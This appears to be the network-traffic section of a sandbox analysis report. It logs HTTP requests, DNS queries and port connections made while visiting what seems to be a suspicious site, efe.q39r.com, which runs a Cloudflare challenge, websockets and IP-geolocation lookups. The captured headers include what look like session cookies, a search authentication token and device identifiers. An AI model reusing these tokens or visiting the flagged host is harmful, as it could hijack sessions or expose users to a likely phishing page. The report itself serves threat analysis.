      Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: 120X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAYPwOLpZD9YPgfrPMf4AeuVLP4KhHN5JW4ZGuoCajahei29Yr4XAvSjo2GPcYQ6ZQfUEQ65l0UpJr5ELA9YbC6aDcfw9byGLR55fg3QE6LpVwB1hIRMQQz%2B8XLjfq1HJSLzI0aPcJRVrUnoq1UsMgbgQmboGwzXKYE3xX%2BmJYuEMa5JIE0RNQGt%2Bb4TRUkyTfk67ddzgXjjpr46msoNA8Lb6qp2RTb39zVnEwQEXjJBfYOg6Mn4yv7MIfIcljCfobMbUmzl4dEwGrgR%2BOzdEe%2BB/SVSihwBPpRPQ3m0R/J3/nTUilxdT1BoiimQhq092UWOV2vGktBCAP6PbrwHj9KQDZgAACMsEQqgi6x8rqAHlMn6l0ukonYgeKuPu1CFsZejFYmSbzagTo5/XhtTabZb1ZO6yoUjfrImR5ADhcBWQq8BCf9F62mDi/s1Ybaza0J3FT4EHOZXX8dk3DgxP/dSBpH14Ow5cFWECZsBa%2B4zcQcr6uUw0ADdf1t6Uvhaeh7SWLWJdtVV4Y%2B6GJmxCapwwypCgDFPU6HDkwgrMIKmMporwxNSsKob/i/9UWoYJct9ZQI0wn155wgeDHJXDTxRkJtX5NjS4B7jzR1T5WoDNfapV3lH8qp3eXpwfjpaKXo%2B8QlUmgJcus/BbqCW15VZ%2Bk1INPyr/Y7cHOF1ZZvhZqbCXmPFjzjHNOCe5c3nJ/u3E84GsYIPBCtO2S7g95Oq91FAAu3wUR81W4ExibwWrsJRClVThXdKgISNvzqTdqj8dPOEgKUZGvJnhTHT6GzRMeyoucNLssj6JPDDANIr3Cn8ir/awGI21RMH3WQIVe7GFFEGK1bi8bBgjlHbC99BD1zU/IuZXaQBV1nqPgx9H0kthhHUgYjTt81auOMy5fw88Q9U7kGVjcU88LOy5Ko//AsBACSDW2gE%3D%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1714062227User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 9555A92DE7EE4ED1A2C38905CA034190X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3DSec-WebSocket-Key: 9MXYgq9kG2JILXmcJ99WsA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://efe.q39r.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pe HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZYaHZCU0tFYk5McldIcTFLcHB2a1E9PSIsInZhbHVlIjoieUczamRrLzYrZENCcVZNUXR1bk1RZGVGU1V1dkIrb2dQZUhzRGF2MEtkLzRGQTI1QWJGY2llMGRTT3VZa3JYeWcyS21ReFlGeGZ0cm5NYk9sOFNEOHJjWWxIMW1XeS96d2ZodFpEa29zS2lmUkM1ckRTRk9IV0VBS0R6K045blYiLCJtYWMiOiJmMGEzYWNlMjg5NmQ0NWQzNjNjZTZjNjVlMDBhYjc4YTVmNDc1YWE1MWEyNDM1ZTdlZTliMDA2ZmU5ZWI5ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imtnd3prWURzME9KNmFXU01vQkw2OVE9PSIsInZhbHVlIjoiTUl0bHhndTlRN2UzNlFBdTBsdE15bUo5R1QvamtmSXJ1ZHJISzJ6d0RmUVcxTTN4SHpQZkFzTkl1TlJFU1ZySnBOMzd0YzZlSlZ2VU5vbE9iQ3hENVVGQ3NYR25QbzBTd0xVaVhzQUpwQ1dsTHBvWDVrQk14Lzc0V2ZleWF2UHQiLCJtYWMiOiJmZmQ3ZDBmNmJkMTk0YWVlZTFmYWM0ZTYxNjc1NWU4ZDA5MDI1N2FlMTMxMDJlY2EwNDllYzhiMmJhYmVkYmE1IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /185.152.66.230/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://efe.q39r.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://efe.q39r.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZYaHZCU0tFYk5McldIcTFLcHB2a1E9PSIsInZhbHVlIjoieUczamRrLzYrZENCcVZNUXR1bk1RZGVGU1V1dkIrb2dQZUhzRGF2MEtkLzRGQTI1QWJGY2llMGRTT3VZa3JYeWcyS21ReFlGeGZ0cm5NYk9sOFNEOHJjWWxIMW1XeS96d2ZodFpEa29zS2lmUkM1ckRTRk9IV0VBS0R6K045blYiLCJtYWMiOiJmMGEzYWNlMjg5NmQ0NWQzNjNjZTZjNjVlMDBhYjc4YTVmNDc1YWE1MWEyNDM1ZTdlZTliMDA2ZmU5ZWI5ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imtnd3prWURzME9KNmFXU01vQkw2OVE9PSIsInZhbHVlIjoiTUl0bHhndTlRN2UzNlFBdTBsdE15bUo5R1QvamtmSXJ1ZHJISzJ6d0RmUVcxTTN4SHpQZkFzTkl1TlJFU1ZySnBOMzd0YzZlSlZ2VU5vbE9iQ3hENVVGQ3NYR25QbzBTd0xVaVhzQUpwQ1dsTHBvWDVrQk14Lzc0V2ZleWF2UHQiLCJtYWMiOiJmZmQ3ZDBmNmJkMTk0YWVlZTFmYWM0ZTYxNjc1NWU4ZDA5MDI1N2FlMTMxMDJlY2EwNDllYzhiMmJhYmVkYmE1IiwidGFnIjoiIn0%3DSec-WebSocket-Key: tQkN5eRpdabnc76NFv/lNg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /185.152.66.230/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjZYaHZCU0tFYk5McldIcTFLcHB2a1E9PSIsInZhbHVlIjoieUczamRrLzYrZENCcVZNUXR1bk1RZGVGU1V1dkIrb2dQZUhzRGF2MEtkLzRGQTI1QWJGY2llMGRTT3VZa3JYeWcyS21ReFlGeGZ0cm5NYk9sOFNEOHJjWWxIMW1XeS96d2ZodFpEa29zS2lmUkM1ckRTRk9IV0VBS0R6K045blYiLCJtYWMiOiJmMGEzYWNlMjg5NmQ0NWQzNjNjZTZjNjVlMDBhYjc4YTVmNDc1YWE1MWEyNDM1ZTdlZTliMDA2ZmU5ZWI5ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imtnd3prWURzME9KNmFXU01vQkw2OVE9PSIsInZhbHVlIjoiTUl0bHhndTlRN2UzNlFBdTBsdE15bUo5R1QvamtmSXJ1ZHJISzJ6d0RmUVcxTTN4SHpQZkFzTkl1TlJFU1ZySnBOMzd0YzZlSlZ2VU5vbE9iQ3hENVVGQ3NYR25QbzBTd0xVaVhzQUpwQ1dsTHBvWDVrQk14Lzc0V2ZleWF2UHQiLCJtYWMiOiJmZmQ3ZDBmNmJkMTk0YWVlZTFmYWM0ZTYxNjc1NWU4ZDA5MDI1N2FlMTMxMDJlY2EwNDllYzhiMmJhYmVkYmE1IiwidGFnIjoiIn0%3DSec-WebSocket-Key: bdfzC/19kvk12b7+Vn2qKw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficDNS traffic detected: DNS query: web.lehighvalleychamber.org
      Source: global trafficDNS traffic detected: DNS query: sanemedia.ca
      Source: global trafficDNS traffic detected: DNS query: efe.q39r.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: global trafficDNS traffic detected: DNS query: httpbin.org
      Source: global trafficDNS traffic detected: DNS query: ipapi.co
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2629sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: f892c8713b88792sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 16:22:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 16:23:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ozS%2FD%2BlhebByb9jaBaCRWoAEncGPbHpc01bkEyWlR9QzWHR%2FB9s%2F%2F50q%2BwlKuLB0VLH2U6N5aT1m2TFYtnVn1eP3Skjt1q0M%2BCesyWR3U00ru6Y6S3N5kKqF3Fs%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 12358Server: cloudflareCF-RAY: 879facd2bd13134d-ATL
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 16:23:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S70y7M7sbBCjNfy%2Bh18yCp7ZP%2BnBLknkOkMCIUGJfhUSN0FD0YzzOHsKROjwT3NpyoHn3yO5UkIPHBxCm9vvLsb3c8whbL4LqAjyMrGuvyJmjdL90tqIENKySvrVTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 879fad962c094566-ATL
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 16:23:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOOtdBSOKx0sZypcN3StNOWiItbWD7Q8R10yGvQIv4EiHazNO6O6z3MkB7m3xEJlPfKnmejAFVF%2Bejz0uh7O2rL5qRf07Th%2B%2Fp7pvrk7rLMvWUtx7NR3ly13Z4UHnA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 879fada9abb444f6-ATL
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 16:24:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDQLz7RdfVLYq8Sp4uObxws6uuK%2FDpH9%2B4j5xh8V2xvz12OMeYg7XayxT%2FLwZRTQ6tAVkZJZ%2FtbPHQkjSBkIB%2Bd%2BRLOGetjc1QRnBZwb6XYz%2F1z7ZXSIORFGDlPCQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 879faef5cd9753d5-ATL
      Source: chromecache_94.1.drString found in binary or memory: https://cloud.google.com/contact
      Source: chromecache_94.1.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
      Source: chromecache_94.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
      Source: chromecache_94.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
      Source: chromecache_94.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
      Source: chromecache_94.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
      Source: chromecache_94.1.drString found in binary or memory: https://recaptcha.net
      Source: chromecache_94.1.drString found in binary or memory: https://support.google.com/recaptcha
      Source: chromecache_94.1.drString found in binary or memory: https://support.google.com/recaptcha#6262736
      Source: chromecache_94.1.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
      Source: chromecache_94.1.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
      Source: chromecache_94.1.drString found in binary or memory: https://www.apache.org/licenses/
      Source: chromecache_94.1.dr, chromecache_112.1.drString found in binary or memory: https://www.google.com/recaptcha/api2/
      Source: chromecache_94.1.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__.
      Source: chromecache_112.1.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
